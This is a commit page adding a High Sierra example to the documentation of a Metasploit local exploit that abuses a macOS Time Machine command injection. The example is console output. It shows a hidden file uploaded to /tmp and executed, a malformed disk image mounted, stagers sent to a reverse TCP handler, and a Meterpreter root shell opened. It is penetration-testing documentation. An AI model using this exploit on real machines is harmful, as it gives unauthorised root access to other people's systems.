add High Sierra scenario

praetorian-inc · Jun 29, 2019 · 6fd18aa · 6fd18aa
1 parent d20801c
commit 6fd18aa
Showing 1 changed file with 21 additions and 0 deletions.
diff --git a/documentation/modules/exploit/osx/local/timemachine_cmd_injection.md b/documentation/modules/exploit/osx/local/timemachine_cmd_injection.md
@@ -39,3 +39,24 @@ msf5 exploit(osx/local/timemachine_cmd_injection) > exploit
 meterpreter > getuid
 Server username: uid=0, gid=0, euid=0, egid=0
 ```
+
+### MacOS 10.13.3 (High Sierra)
+
+```
+[!] SESSION may not be compatible with this module.
+[*] Started reverse TCP handler on 192.168.86.1.31:4444
+[*] Uploading file: '/tmp/.xbdtqiynvb'
+[*] Executing exploit '/tmp/.xbdtqiynvb'
+[*] Exploit result:
+2019-06-29 12:26:29.052 .xbdtqiynvb[553:3447] creating dmg image
+2019-06-29 12:26:33.193 .xbdtqiynvb[553:3447] mounting malformed disk
+2019-06-29 12:26:33.533 .xbdtqiynvb[553:3447] sending XPC msg
+2019-06-29 12:26:33.534 .xbdtqiynvb[553:3447] now wait a few minutes for the root command to run
+[*] Transmitting first stager...(210 bytes)
+[*] Transmitting second stager...(8192 bytes)
+[*] Sending stage (813560 bytes) to 192.168.86.1.32
+[*] Meterpreter session 3 opened (192.168.86.1.31:4444 -> 192.168.86.1.32:55888) at 2019-06-29 05:27:24 -0500
+
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+```